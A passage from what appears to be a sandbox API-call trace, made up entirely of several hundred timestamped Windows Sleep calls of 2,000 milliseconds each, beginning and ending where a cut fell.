(dwMilliseconds=0x7d0) [0227.530] Sleep (dwMilliseconds=0x7d0) [0227.531] Sleep (dwMilliseconds=0x7d0) [0227.538] Sleep (dwMilliseconds=0x7d0) [0227.544] Sleep (dwMilliseconds=0x7d0) [0227.545] Sleep (dwMilliseconds=0x7d0) [0227.552] Sleep (dwMilliseconds=0x7d0) [0227.553] Sleep (dwMilliseconds=0x7d0) [0227.559] Sleep (dwMilliseconds=0x7d0) [0227.566] Sleep (dwMilliseconds=0x7d0) [0227.568] Sleep (dwMilliseconds=0x7d0) [0227.570] Sleep (dwMilliseconds=0x7d0) [0227.574] Sleep (dwMilliseconds=0x7d0) [0227.576] Sleep (dwMilliseconds=0x7d0) [0227.582] Sleep (dwMilliseconds=0x7d0) [0227.588] Sleep (dwMilliseconds=0x7d0) [0227.590] Sleep (dwMilliseconds=0x7d0) [0227.597] Sleep (dwMilliseconds=0x7d0) [0227.598] Sleep (dwMilliseconds=0x7d0) [0227.604] Sleep (dwMilliseconds=0x7d0) [0227.611] Sleep (dwMilliseconds=0x7d0) [0227.613] Sleep (dwMilliseconds=0x7d0) [0227.617] Sleep (dwMilliseconds=0x7d0) [0227.619] Sleep (dwMilliseconds=0x7d0) [0227.626] Sleep (dwMilliseconds=0x7d0) [0227.632] Sleep (dwMilliseconds=0x7d0) [0227.633] Sleep (dwMilliseconds=0x7d0) [0227.640] Sleep (dwMilliseconds=0x7d0) [0227.647] Sleep (dwMilliseconds=0x7d0) [0227.649] Sleep (dwMilliseconds=0x7d0) [0227.654] Sleep (dwMilliseconds=0x7d0) [0227.656] Sleep (dwMilliseconds=0x7d0) [0227.663] Sleep (dwMilliseconds=0x7d0) [0227.664] Sleep (dwMilliseconds=0x7d0) [0227.673] Sleep (dwMilliseconds=0x7d0) [0227.675] Sleep (dwMilliseconds=0x7d0) [0227.683] Sleep (dwMilliseconds=0x7d0) [0227.684] Sleep (dwMilliseconds=0x7d0) [0227.693] Sleep (dwMilliseconds=0x7d0) [0227.701] Sleep (dwMilliseconds=0x7d0) [0227.703] Sleep (dwMilliseconds=0x7d0) [0227.709] Sleep (dwMilliseconds=0x7d0) [0227.711] Sleep (dwMilliseconds=0x7d0) [0227.713] Sleep (dwMilliseconds=0x7d0) [0227.720] Sleep (dwMilliseconds=0x7d0) [0227.731] Sleep (dwMilliseconds=0x7d0) [0227.740] Sleep (dwMilliseconds=0x7d0) [0227.749] Sleep (dwMilliseconds=0x7d0) [0227.750] Sleep (dwMilliseconds=0x7d0) [0227.757] Sleep (dwMilliseconds=0x7d0) [0227.759] Sleep (dwMilliseconds=0x7d0) [0227.760] Sleep (dwMilliseconds=0x7d0) [0227.767] Sleep (dwMilliseconds=0x7d0) [0227.769] Sleep (dwMilliseconds=0x7d0) [0227.776] Sleep (dwMilliseconds=0x7d0) [0227.777] Sleep (dwMilliseconds=0x7d0) [0227.785] Sleep (dwMilliseconds=0x7d0) [0227.787] Sleep (dwMilliseconds=0x7d0) [0227.794] Sleep (dwMilliseconds=0x7d0) [0227.796] Sleep (dwMilliseconds=0x7d0) [0227.803] Sleep (dwMilliseconds=0x7d0) [0227.805] Sleep (dwMilliseconds=0x7d0) [0227.812] Sleep (dwMilliseconds=0x7d0) [0227.813] Sleep (dwMilliseconds=0x7d0) [0227.821] Sleep (dwMilliseconds=0x7d0) [0227.823] Sleep (dwMilliseconds=0x7d0) [0227.832] Sleep (dwMilliseconds=0x7d0) [0227.839] Sleep (dwMilliseconds=0x7d0) [0227.848] Sleep (dwMilliseconds=0x7d0) [0227.850] Sleep (dwMilliseconds=0x7d0) [0227.858] Sleep (dwMilliseconds=0x7d0) [0227.860] Sleep (dwMilliseconds=0x7d0) [0227.867] Sleep (dwMilliseconds=0x7d0) [0227.869] Sleep (dwMilliseconds=0x7d0) [0227.877] Sleep (dwMilliseconds=0x7d0) [0227.914] Sleep (dwMilliseconds=0x7d0) [0227.916] Sleep (dwMilliseconds=0x7d0) [0227.928] Sleep (dwMilliseconds=0x7d0) [0227.938] Sleep (dwMilliseconds=0x7d0) [0227.940] Sleep (dwMilliseconds=0x7d0) [0227.948] Sleep (dwMilliseconds=0x7d0) [0227.955] Sleep (dwMilliseconds=0x7d0) [0227.961] Sleep (dwMilliseconds=0x7d0) [0227.968] Sleep (dwMilliseconds=0x7d0) [0227.969] Sleep (dwMilliseconds=0x7d0) [0227.974] Sleep (dwMilliseconds=0x7d0) [0227.976] Sleep (dwMilliseconds=0x7d0) [0227.981] Sleep (dwMilliseconds=0x7d0) [0227.983] Sleep (dwMilliseconds=0x7d0) [0227.991] Sleep (dwMilliseconds=0x7d0) [0227.998] Sleep (dwMilliseconds=0x7d0) [0228.005] Sleep (dwMilliseconds=0x7d0) [0228.007] Sleep (dwMilliseconds=0x7d0) [0228.012] Sleep (dwMilliseconds=0x7d0) [0228.020] Sleep (dwMilliseconds=0x7d0) [0228.021] Sleep (dwMilliseconds=0x7d0) [0228.024] Sleep (dwMilliseconds=0x7d0) [0228.029] Sleep (dwMilliseconds=0x7d0) [0228.036] Sleep (dwMilliseconds=0x7d0) [0228.042] Sleep (dwMilliseconds=0x7d0) [0228.049] Sleep (dwMilliseconds=0x7d0) [0228.050] Sleep (dwMilliseconds=0x7d0) [0228.060] Sleep (dwMilliseconds=0x7d0) [0228.067] Sleep (dwMilliseconds=0x7d0) [0228.068] Sleep (dwMilliseconds=0x7d0) [0228.072] Sleep (dwMilliseconds=0x7d0) [0228.075] Sleep (dwMilliseconds=0x7d0) [0228.082] Sleep (dwMilliseconds=0x7d0) [0228.089] Sleep (dwMilliseconds=0x7d0) [0228.091] Sleep (dwMilliseconds=0x7d0) [0228.097] Sleep (dwMilliseconds=0x7d0) [0228.099] Sleep (dwMilliseconds=0x7d0) [0228.105] Sleep (dwMilliseconds=0x7d0) [0228.107] Sleep (dwMilliseconds=0x7d0) [0228.113] Sleep (dwMilliseconds=0x7d0) [0228.122] Sleep (dwMilliseconds=0x7d0) [0228.125] Sleep (dwMilliseconds=0x7d0) [0228.134] Sleep (dwMilliseconds=0x7d0) [0228.141] Sleep (dwMilliseconds=0x7d0) [0228.148] Sleep (dwMilliseconds=0x7d0) [0228.156] Sleep (dwMilliseconds=0x7d0) [0228.157] Sleep (dwMilliseconds=0x7d0) [0228.164] Sleep (dwMilliseconds=0x7d0) [0228.171] Sleep (dwMilliseconds=0x7d0) [0228.173] Sleep (dwMilliseconds=0x7d0) [0228.174] Sleep (dwMilliseconds=0x7d0) [0228.181] Sleep (dwMilliseconds=0x7d0) [0228.208] Sleep (dwMilliseconds=0x7d0) [0228.218] Sleep (dwMilliseconds=0x7d0) [0228.224] Sleep (dwMilliseconds=0x7d0) [0228.225] Sleep (dwMilliseconds=0x7d0) [0228.231] Sleep (dwMilliseconds=0x7d0) [0228.238] Sleep (dwMilliseconds=0x7d0) [0228.240] Sleep (dwMilliseconds=0x7d0) [0228.248] Sleep (dwMilliseconds=0x7d0) [0228.250] Sleep (dwMilliseconds=0x7d0) [0228.252] Sleep (dwMilliseconds=0x7d0) [0228.255] Sleep (dwMilliseconds=0x7d0) [0228.257] Sleep (dwMilliseconds=0x7d0) [0228.262] Sleep (dwMilliseconds=0x7d0) [0228.264] Sleep (dwMilliseconds=0x7d0) [0228.270] Sleep (dwMilliseconds=0x7d0) [0228.278] Sleep (dwMilliseconds=0x7d0) [0228.279] Sleep (dwMilliseconds=0x7d0) [0228.285] Sleep (dwMilliseconds=0x7d0) [0228.287] Sleep (dwMilliseconds=0x7d0) [0228.292] Sleep (dwMilliseconds=0x7d0) [0228.297] Sleep (dwMilliseconds=0x7d0) [0228.299] Sleep (dwMilliseconds=0x7d0) [0228.305] Sleep (dwMilliseconds=0x7d0) [0228.312] Sleep (dwMilliseconds=0x7d0) [0228.318] Sleep (dwMilliseconds=0x7d0) [0228.320] Sleep (dwMilliseconds=0x7d0) [0228.325] Sleep (dwMilliseconds=0x7d0) [0228.327] Sleep (dwMilliseconds=0x7d0) [0228.332] Sleep (dwMilliseconds=0x7d0) [0228.335] Sleep (dwMilliseconds=0x7d0) [0228.348] Sleep (dwMilliseconds=0x7d0) [0228.350] Sleep (dwMilliseconds=0x7d0) [0228.352] Sleep (dwMilliseconds=0x7d0) [0228.356] Sleep (dwMilliseconds=0x7d0) [0228.357] Sleep (dwMilliseconds=0x7d0) [0228.362] Sleep (dwMilliseconds=0x7d0) [0228.369] Sleep (dwMilliseconds=0x7d0) [0228.371] Sleep (dwMilliseconds=0x7d0) [0228.376] Sleep (dwMilliseconds=0x7d0) [0228.383] Sleep (dwMilliseconds=0x7d0) [0228.390] Sleep (dwMilliseconds=0x7d0) [0228.392] Sleep (dwMilliseconds=0x7d0) [0228.397] Sleep (dwMilliseconds=0x7d0) [0228.398] Sleep (dwMilliseconds=0x7d0) [0228.405] Sleep (dwMilliseconds=0x7d0) [0228.411] Sleep (dwMilliseconds=0x7d0) [0228.413] Sleep (dwMilliseconds=0x7d0) [0228.419] Sleep (dwMilliseconds=0x7d0) [0228.420] Sleep (dwMilliseconds=0x7d0) [0228.426] Sleep (dwMilliseconds=0x7d0) [0228.433] Sleep (dwMilliseconds=0x7d0) [0228.435] Sleep (dwMilliseconds=0x7d0) [0228.441] Sleep (dwMilliseconds=0x7d0) [0228.444] Sleep (dwMilliseconds=0x7d0) [0228.448] Sleep (dwMilliseconds=0x7d0) [0228.450] Sleep (dwMilliseconds=0x7d0) [0228.458] Sleep (dwMilliseconds=0x7d0) [0228.460] Sleep (dwMilliseconds=0x7d0) [0228.465] Sleep (dwMilliseconds=0x7d0) [0228.467] Sleep (dwMilliseconds=0x7d0) [0228.472] Sleep (dwMilliseconds=0x7d0) [0228.474] Sleep (dwMilliseconds=0x7d0) [0228.480] Sleep (dwMilliseconds=0x7d0) [0228.486] Sleep (dwMilliseconds=0x7d0) [0228.493] Sleep (dwMilliseconds=0x7d0) [0228.497] Sleep (dwMilliseconds=0x7d0) [0228.504] Sleep (dwMilliseconds=0x7d0) [0228.505] Sleep (dwMilliseconds=0x7d0) [0228.511] Sleep (dwMilliseconds=0x7d0) [0228.512] Sleep (dwMilliseconds=0x7d0) [0228.518] Sleep (dwMilliseconds=0x7d0) [0228.520] Sleep (dwMilliseconds=0x7d0) [0228.526] Sleep (dwMilliseconds=0x7d0) [0228.528] Sleep (dwMilliseconds=0x7d0) [0228.534] Sleep (dwMilliseconds=0x7d0) [0228.538] Sleep (dwMilliseconds=0x7d0) [0228.542] Sleep (dwMilliseconds=0x7d0) [0228.543] Sleep (dwMilliseconds=0x7d0) [0228.549] Sleep (dwMilliseconds=0x7d0) [0228.550] Sleep (dwMilliseconds=0x7d0) [0228.556] Sleep (dwMilliseconds=0x7d0) [0228.558] Sleep (dwMilliseconds=0x7d0) [0228.563] Sleep (dwMilliseconds=0x7d0) [0228.565] Sleep (dwMilliseconds=0x7d0) [0228.571] Sleep (dwMilliseconds=0x7d0) [0228.572] Sleep (dwMilliseconds=0x7d0) [0228.579] Sleep (dwMilliseconds=0x7d0) [0228.584] Sleep (dwMilliseconds=0x7d0) [0228.590] Sleep (dwMilliseconds=0x7d0) [0228.597] Sleep (dwMilliseconds=0x7d0) [0228.605] Sleep (dwMilliseconds=0x7d0) [0228.612] Sleep (dwMilliseconds=0x7d0) [0228.620] Sleep (dwMilliseconds=0x7d0) [0228.621] Sleep (dwMilliseconds=0x7d0) [0228.627] Sleep (dwMilliseconds=0x7d0) [0228.631] Sleep (dwMilliseconds=0x7d0) [0228.640] Sleep (dwMilliseconds=0x7d0) [0228.642] Sleep (dwMilliseconds=0x7d0) [0228.649] Sleep (dwMilliseconds=0x7d0) [0228.658] Sleep (dwMilliseconds=0x7d0) [0228.659] Sleep (dwMilliseconds=0x7d0) [0228.670] Sleep (dwMilliseconds=0x7d0) [0228.680] Sleep (dwMilliseconds=0x7d0) [0228.687] Sleep (dwMilliseconds=0x7d0) [0228.690] Sleep (dwMilliseconds=0x7d0) [0228.696] Sleep (dwMilliseconds=0x7d0) [0228.698] Sleep (dwMilliseconds=0x7d0) [0228.706] Sleep (dwMilliseconds=0x7d0) [0228.714] Sleep (dwMilliseconds=0x7d0) [0228.716] Sleep (dwMilliseconds=0x7d0) [0228.723] Sleep (dwMilliseconds=0x7d0) [0228.725] Sleep (dwMilliseconds=0x7d0) [0228.729] Sleep (dwMilliseconds=0x7d0) [0228.732] Sleep (dwMilliseconds=0x7d0) [0228.742] Sleep (dwMilliseconds=0x7d0) [0228.744] Sleep (dwMilliseconds=0x7d0) [0228.750] Sleep (dwMilliseconds=0x7d0) [0228.757] Sleep (dwMilliseconds=0x7d0) [0228.758] Sleep (dwMilliseconds=0x7d0) [0228.764] Sleep (dwMilliseconds=0x7d0) [0228.766] Sleep (dwMilliseconds=0x7d0) [0228.773] Sleep (dwMilliseconds=0x7d0) [0228.778] Sleep (dwMilliseconds=0x7d0) [0228.781] Sleep (dwMilliseconds=0x7d0) [0228.783] Sleep (dwMilliseconds=0x7d0) [0228.789] Sleep (dwMilliseconds=0x7d0) [0228.798] Sleep (dwMilliseconds=0x7d0) [0228.806] Sleep (dwMilliseconds=0x7d0) [0228.813] Sleep (dwMilliseconds=0x7d0) [0228.815] Sleep (dwMilliseconds=0x7d0) [0228.820] Sleep (dwMilliseconds=0x7d0) [0228.822] Sleep (dwMilliseconds=0x7d0) [0228.823] Sleep (dwMilliseconds=0x7d0) [0228.831] Sleep (dwMilliseconds=0x7d0) [0228.832] Sleep (dwMilliseconds=0x7d0) [0228.838] Sleep (dwMilliseconds=0x7d0) [0228.840] Sleep (dwMilliseconds=0x7d0) [0228.847] Sleep (dwMilliseconds=0x7d0) [0228.855] Sleep (dwMilliseconds=0x7d0) [0228.856] Sleep (dwMilliseconds=0x7d0) [0228.864] Sleep (dwMilliseconds=0x7d0) [0228.865] Sleep (dwMilliseconds=0x7d0) [0228.871] Sleep (dwMilliseconds=0x7d0) [0228.873] Sleep (dwMilliseconds=0x7d0) [0228.881] Sleep (dwMilliseconds=0x7d0) [0228.883] Sleep (dwMilliseconds=0x7d0) [0228.915] Sleep (dwMilliseconds=0x7d0) [0228.922] Sleep (dwMilliseconds=0x7d0) [0228.924] Sleep (dwMilliseconds=0x7d0) [0228.929] Sleep (dwMilliseconds=0x7d0) [0228.930] Sleep (dwMilliseconds=0x7d0) [0228.936] Sleep (dwMilliseconds=0x7d0) [0228.941] Sleep (dwMilliseconds=0x7d0) [0228.942] Sleep (dwMilliseconds=0x7d0) [0228.945] Sleep (dwMilliseconds=0x7d0) [0228.950] Sleep (dwMilliseconds=0x7d0) [0228.952] Sleep (dwMilliseconds=0x7d0) [0228.958] Sleep (dwMilliseconds=0x7d0) [0228.960] Sleep (dwMilliseconds=0x7d0) [0228.968] Sleep (dwMilliseconds=0x7d0) [0228.970] Sleep (dwMilliseconds=0x7d0) [0228.979] Sleep (dwMilliseconds=0x7d0) [0228.986] Sleep (dwMilliseconds=0x7d0) [0228.990] Sleep (dwMilliseconds=0x7d0) [0228.992] Sleep (dwMilliseconds=0x7d0) [0229.000] Sleep (dwMilliseconds=0x7d0) [0229.009] Sleep (dwMilliseconds=0x7d0) [0229.010] Sleep (dwMilliseconds=0x7d0) [0229.019] Sleep (dwMilliseconds=0x7d0) [0229.029] Sleep (dwMilliseconds=0x7d0) [0229.030] Sleep (dwMilliseconds=0x7d0) [0229.032] Sleep (dwMilliseconds=0x7d0) [0229.038] Sleep (dwMilliseconds=0x7d0) [0229.040] Sleep (dwMilliseconds=0x7d0) [0229.049] Sleep (dwMilliseconds=0x7d0) [0229.051] Sleep (dwMilliseconds=0x7d0) [0229.060] Sleep (dwMilliseconds=0x7d0) [0229.062] Sleep (dwMilliseconds=0x7d0) [0229.070] Sleep (dwMilliseconds=0x7d0) [0229.071] Sleep (dwMilliseconds=0x7d0) [0229.079] Sleep (dwMilliseconds=0x7d0) [0229.081] Sleep (dwMilliseconds=0x7d0) [0229.082] Sleep (dwMilliseconds=0x7d0) [0229.091] Sleep (dwMilliseconds=0x7d0) [0229.092] Sleep (dwMilliseconds=0x7d0) [0229.100] Sleep (dwMilliseconds=0x7d0) [0229.109] Sleep (dwMilliseconds=0x7d0) [0229.119] Sleep (dwMilliseconds=0x7d0) [0229.121] Sleep (dwMilliseconds=0x7d0) [0229.127] Sleep (dwMilliseconds=0x7d0) [0229.133] Sleep (dwMilliseconds=0x7d0) [0229.142] Sleep (dwMilliseconds=0x7d0) [0229.145] Sleep (dwMilliseconds=0x7d0) [0229.153] Sleep (dwMilliseconds=0x7d0) [0229.163] Sleep (dwMilliseconds=0x7d0) [0229.165] Sleep (dwMilliseconds=0x7d0) [0229.172] Sleep (dwMilliseconds=0x7d0) [0229.175] Sleep (dwMilliseconds=0x7d0) [0229.182] Sleep (dwMilliseconds=0x7d0) [0229.194] Sleep (dwMilliseconds=0x7d0) [0229.208] Sleep (dwMilliseconds=0x7d0) [0229.217] Sleep (dwMilliseconds=0x7d0) [0229.223] Sleep (dwMilliseconds=0x7d0) [0229.227] Sleep (dwMilliseconds=0x7d0) [0229.229] Sleep (dwMilliseconds=0x7d0) [0229.238] Sleep (dwMilliseconds=0x7d0) [0229.248] Sleep (dwMilliseconds=0x7d0) [0229.259] Sleep (dwMilliseconds=0x7d0) [0229.267] Sleep (dwMilliseconds=0x7d0) [0229.268] Sleep (dwMilliseconds=0x7d0) [0229.283] Sleep (dwMilliseconds=0x7d0) [0229.294] Sleep (dwMilliseconds=0x7d0) [0229.296] Sleep (dwMilliseconds=0x7d0) [0229.306] Sleep (dwMilliseconds=0x7d0) [0229.319] Sleep (dwMilliseconds=0x7d0) [0229.322] Sleep (dwMilliseconds=0x7d0) [0229.328] Sleep (dwMilliseconds=0x7d0) [0229.330] Sleep (dwMilliseconds=0x7d0) [0229.338] Sleep (dwMilliseconds=0x7d0) [0229.442] Sleep (dwMilliseconds=0x7d0) [0229.482] Sleep (dwMilliseconds=0x7d0) [0229.488] Sleep (dwMilliseconds=0x7d0) [0229.490] Sleep (dwMilliseconds=0x7d0) [0229.496] Sleep (dwMilliseconds=0x7d0) [0229.498] Sleep (dwMilliseconds=0x7d0) [0229.504] Sleep (dwMilliseconds=0x7d0) [0229.505] Sleep (dwMilliseconds=0x7d0) [0229.511] Sleep (dwMilliseconds=0x7d0) [0229.520] Sleep (dwMilliseconds=0x7d0) [0229.521] Sleep (dwMilliseconds=0x7d0) [0229.527] Sleep (dwMilliseconds=0x7d0) [0229.535] Sleep (dwMilliseconds=0x7d0) [0229.536] Sleep (dwMilliseconds=0x7d0) [0229.542] Sleep (dwMilliseconds=0x7d0) [0229.544] Sleep (dwMilliseconds=0x7d0) [0229.549] Sleep (dwMilliseconds=0x7d0) [0229.551] Sleep (dwMilliseconds=0x7d0) [0229.579] Sleep (dwMilliseconds=0x7d0) [0229.604] Sleep (dwMilliseconds=0x7d0) [0229.615] Sleep (dwMilliseconds=0x7d0) [0229.624] Sleep (dwMilliseconds=0x7d0) [0229.625] Sleep (dwMilliseconds=0x7d0) [0229.633] Sleep (dwMilliseconds=0x7d0) [0229.641] Sleep (dwMilliseconds=0x7d0) [0229.643] Sleep (dwMilliseconds=0x7d0) [0229.647] Sleep (dwMilliseconds=0x7d0) [0229.649] Sleep (dwMilliseconds=0x7d0) [0229.650] Sleep (dwMilliseconds=0x7d0) [0229.656] Sleep (dwMilliseconds=0x7d0) [0229.657] Sleep (dwMilliseconds=0x7d0) [0229.663] Sleep (dwMilliseconds=0x7d0) [0229.664] Sleep (dwMilliseconds=0x7d0) [0229.671] Sleep (dwMilliseconds=0x7d0) [0229.677] Sleep (dwMilliseconds=0x7d0) [0229.683] Sleep (dwMilliseconds=0x7d0) [0229.685] Sleep (dwMilliseconds=0x7d0) [0229.690] Sleep (dwMilliseconds=0x7d0) [0229.692] Sleep (dwMilliseconds=0x7d0) [0229.698] Sleep (dwMilliseconds=0x7d0) [0229.699] Sleep (dwMilliseconds=0x7d0) [0229.705] Sleep (dwMilliseconds=0x7d0) [0229.706] Sleep (dwMilliseconds=0x7d0) [0229.712] Sleep (dwMilliseconds=0x7d0) [0229.714] Sleep (dwMilliseconds=0x7d0) [0229.719] Sleep (dwMilliseconds=0x7d0) [0229.725] Sleep (dwMilliseconds=0x7d0) [0229.729] Sleep (dwMilliseconds=0x7d0) [0229.734] Sleep (dwMilliseconds=0x7d0) [0229.736] Sleep (dwMilliseconds=0x7d0) [0229.739] Sleep (dwMilliseconds=0x7d0) [0229.744] Sleep (dwMilliseconds=0x7d0) [0229.751] Sleep (dwMilliseconds=0x7d0) [0229.752] Sleep (dwMilliseconds=0x7d0) [0229.758] Sleep (dwMilliseconds=0x7d0) [0229.759] Sleep (dwMilliseconds=0x7d0) [0229.764] Sleep (dwMilliseconds=0x7d0) [0229.771] Sleep (dwMilliseconds=0x7d0) [0229.772] Sleep (dwMilliseconds=0x7d0) [0229.779] Sleep (dwMilliseconds=0x7d0) [0229.785] Sleep (dwMilliseconds=0x7d0) [0229.786] Sleep (dwMilliseconds=0x7d0) [0229.792] Sleep (dwMilliseconds=0x7d0) [0229.799] Sleep (dwMilliseconds=0x7d0) [0229.805] Sleep (dwMilliseconds=0x7d0) [0229.812] Sleep (dwMilliseconds=0x7d0) [0229.814] Sleep (dwMilliseconds=0x7d0) [0229.819] Sleep (dwMilliseconds=0x7d0) [0229.821] Sleep (dwMilliseconds=0x7d0) [0229.826] Sleep (dwMilliseconds=0x7d0) [0229.828] Sleep (dwMilliseconds=0x7d0) [0229.830] Sleep (dwMilliseconds=0x7d0) [0229.835] Sleep (dwMilliseconds=0x7d0) [0229.837] Sleep (dwMilliseconds=0x7d0) [0229.843] Sleep (dwMilliseconds=0x7d0) [0229.844] Sleep (dwMilliseconds=0x7d0) [0229.850] Sleep (dwMilliseconds=0x7d0) [0229.852] Sleep (dwMilliseconds=0x7d0) [0229.859] Sleep (dwMilliseconds=0x7d0) [0229.867] Sleep (dwMilliseconds=0x7d0) [0229.870] Sleep (dwMilliseconds=0x7d0) [0229.876] Sleep (dwMilliseconds=0x7d0) [0229.878] Sleep (dwMilliseconds=0x7d0) [0229.881] Sleep (dwMilliseconds=0x7d0) [0229.886] Sleep (dwMilliseconds=0x7d0) [0229.887] Sleep (dwMilliseconds=0x7d0) [0229.893] Sleep (dwMilliseconds=0x7d0) [0229.894] Sleep (dwMilliseconds=0x7d0) [0229.899] Sleep (dwMilliseconds=0x7d0) [0229.901] Sleep (dwMilliseconds=0x7d0) [0229.906] Sleep (dwMilliseconds=0x7d0) [0229.908] Sleep (dwMilliseconds=0x7d0) [0229.913] Sleep (dwMilliseconds=0x7d0) [0229.957] Sleep (dwMilliseconds=0x7d0) [0229.959] Sleep (dwMilliseconds=0x7d0) [0229.964] Sleep (dwMilliseconds=0x7d0) [0229.966] Sleep (dwMilliseconds=0x7d0) [0229.972] Sleep (dwMilliseconds=0x7d0) [0229.974] Sleep (dwMilliseconds=0x7d0) [0229.980] Sleep (dwMilliseconds=0x7d0) [0229.989] Sleep (dwMilliseconds=0x7d0) [0229.991] Sleep (dwMilliseconds=0x7d0) [0229.998] Sleep (dwMilliseconds=0x7d0) [0230.000] Sleep (dwMilliseconds=0x7d0) [0230.006] Sleep (dwMilliseconds=0x7d0) [0230.012] Sleep (dwMilliseconds=0x7d0) [0230.014] Sleep (dwMilliseconds=0x7d0) [0230.020] Sleep (dwMilliseconds=0x7d0) [0230.022] Sleep (dwMilliseconds=0x7d0) [0230.031] Sleep (dwMilliseconds=0x7d0) [0230.032] Sleep (dwMilliseconds=0x7d0) [0230.038] Sleep (dwMilliseconds=0x7d0) [0230.040] Sleep (dwMilliseconds=0x7d0) [0230.045] Sleep (dwMilliseconds=0x7d0) [0230.053] Sleep (dwMilliseconds=0x7d0) [0230.054] Sleep (dwMilliseconds=0x7d0) [0230.060] Sleep (dwMilliseconds=0x7d0) [0230.061] Sleep (dwMilliseconds=0x7d0) [0230.063] Sleep (dwMilliseconds=0x7d0) [0230.071] Sleep (dwMilliseconds=0x7d0) [0230.077] Sleep (dwMilliseconds=0x7d0) [0230.080] Sleep (dwMilliseconds=0x7d0) [0230.085] Sleep (dwMilliseconds=0x7d0) [0230.087] Sleep (dwMilliseconds=0x7d0) [0230.093] Sleep (dwMilliseconds=0x7d0) [0230.094] Sleep (dwMilliseconds=0x7d0) [0230.100] Sleep (dwMilliseconds=0x7d0) [0230.102] Sleep (dwMilliseconds=0x7d0) [0230.108] Sleep (dwMilliseconds=0x7d0) [0230.110] Sleep (dwMilliseconds=0x7d0) [0230.112] Sleep (dwMilliseconds=0x7d0) [0230.115] Sleep (dwMilliseconds=0x7d0) [0230.117] Sleep (dwMilliseconds=0x7d0) [0230.123] Sleep (dwMilliseconds=0x7d0) [0230.124] Sleep (dwMilliseconds=0x7d0) [0230.154] Sleep (dwMilliseconds=0x7d0) [0230.155] Sleep (dwMilliseconds=0x7d0) [0230.162] Sleep (dwMilliseconds=0x7d0) [0230.163] Sleep (dwMilliseconds=0x7d0) [0230.170] Sleep (dwMilliseconds=0x7d0) [0230.171] Sleep (dwMilliseconds=0x7d0) [0230.177] Sleep (dwMilliseconds=0x7d0) [0230.182] Sleep (dwMilliseconds=0x7d0) [0230.186] Sleep (dwMilliseconds=0x7d0) [0230.187] Sleep (dwMilliseconds=0x7d0) [0230.193] Sleep (dwMilliseconds=0x7d0) [0230.200] Sleep (dwMilliseconds=0x7d0) [0230.202] Sleep (dwMilliseconds=0x7d0) [0230.208] Sleep (dwMilliseconds=0x7d0) [0230.217] Sleep (dwMilliseconds=0x7d0) [0230.219] Sleep (dwMilliseconds=0x7d0) [0230.225] Sleep (dwMilliseconds=0x7d0) [0230.227] Sleep (dwMilliseconds=0x7d0) [0230.231] Sleep (dwMilliseconds=0x7d0) [0230.234] Sleep (dwMilliseconds=0x7d0) [0230.235] Sleep (dwMilliseconds=0x7d0) [0230.241] Sleep (dwMilliseconds=0x7d0) [0230.243] Sleep (dwMilliseconds=0x7d0) [0230.248] Sleep (dwMilliseconds=0x7d0) [0230.254] Sleep (dwMilliseconds=0x7d0) [0230.256] Sleep (dwMilliseconds=0x7d0) [0230.263] Sleep (dwMilliseconds=0x7d0) [0230.264] Sleep (dwMilliseconds=0x7d0) [0230.270] Sleep (dwMilliseconds=0x7d0) [0230.272] Sleep (dwMilliseconds=0x7d0) [0230.278] Sleep (dwMilliseconds=0x7d0) [0230.280] Sleep (dwMilliseconds=0x7d0) [0230.286] Sleep (dwMilliseconds=0x7d0) [0230.293] Sleep (dwMilliseconds=0x7d0) [0230.295] Sleep (dwMilliseconds=0x7d0) [0230.300] Sleep (dwMilliseconds=0x7d0) [0230.302] Sleep (dwMilliseconds=0x7d0) [0230.308] Sleep (dwMilliseconds=0x7d0) [0230.318] Sleep (dwMilliseconds=0x7d0) [0230.320] Sleep (dwMilliseconds=0x7d0) [0230.325] Sleep (dwMilliseconds=0x7d0) [0230.327] Sleep (dwMilliseconds=0x7d0) [0230.328] Sleep (dwMilliseconds=0x7d0) [0230.332] Sleep (dwMilliseconds=0x7d0) [0230.334] Sleep (dwMilliseconds=0x7d0) [0230.347] Sleep (dwMilliseconds=0x7d0) [0230.348] Sleep (dwMilliseconds=0x7d0) [0230.355] Sleep (dwMilliseconds=0x7d0) [0230.362] Sleep (dwMilliseconds=0x7d0) [0230.364] Sleep (dwMilliseconds=0x7d0) [0230.370] Sleep (dwMilliseconds=0x7d0) [0230.371] Sleep (dwMilliseconds=0x7d0) [0230.377] Sleep (dwMilliseconds=0x7d0) [0230.378] Sleep (dwMilliseconds=0x7d0) [0230.381] Sleep (dwMilliseconds=0x7d0) [0230.383] Sleep (dwMilliseconds=0x7d0) [0230.386] Sleep (dwMilliseconds=0x7d0) [0230.391] Sleep (dwMilliseconds=0x7d0) [0230.397] Sleep (dwMilliseconds=0x7d0) [0230.399] Sleep (dwMilliseconds=0x7d0) [0230.404] Sleep (dwMilliseconds=0x7d0) [0230.406] Sleep (dwMilliseconds=0x7d0) [0230.411] Sleep (dwMilliseconds=0x7d0) [0230.413] Sleep (dwMilliseconds=0x7d0) [0230.418] Sleep (dwMilliseconds=0x7d0) [0230.420] Sleep (dwMilliseconds=0x7d0) [0230.425] Sleep (dwMilliseconds=0x7d0) [0230.426] Sleep (dwMilliseconds=0x7d0) [0230.431] Sleep (dwMilliseconds=0x7d0) [0230.433] Sleep (dwMilliseconds=0x7d0) [0230.441] Sleep (dwMilliseconds=0x7d0) [0230.442] Sleep (dwMilliseconds=0x7d0) [0230.448] Sleep (dwMilliseconds=0x7d0) [0230.450] Sleep (dwMilliseconds=0x7d0) [0230.458] Sleep (dwMilliseconds=0x7d0) [0230.460] Sleep (dwMilliseconds=0x7d0) [0230.466] Sleep (dwMilliseconds=0x7d0) [0230.468] Sleep (dwMilliseconds=0x7d0) [0230.474] Sleep (dwMilliseconds=0x7d0) [0230.476] Sleep (dwMilliseconds=0x7d0) [0230.478] Sleep (dwMilliseconds=0x7d0) [0230.484] Sleep (dwMilliseconds=0x7d0) [0230.486] Sleep (dwMilliseconds=0x7d0) [0230.492] Sleep (dwMilliseconds=0x7d0) [0230.499] Sleep (dwMilliseconds=0x7d0) [0230.501] Sleep (dwMilliseconds=0x7d0) [0230.506] Sleep (dwMilliseconds=0x7d0) [0230.508] Sleep (dwMilliseconds=0x7d0) [0230.514] Sleep (dwMilliseconds=0x7d0) [0230.519] Sleep (dwMilliseconds=0x7d0) [0230.525] Sleep (dwMilliseconds=0x7d0) [0230.527] Sleep (dwMilliseconds=0x7d0) [0230.530] Sleep (dwMilliseconds=0x7d0) [0230.532] Sleep (dwMilliseconds=0x7d0) [0230.534] Sleep (dwMilliseconds=0x7d0) [0230.539] Sleep (dwMilliseconds=0x7d0) [0230.540] 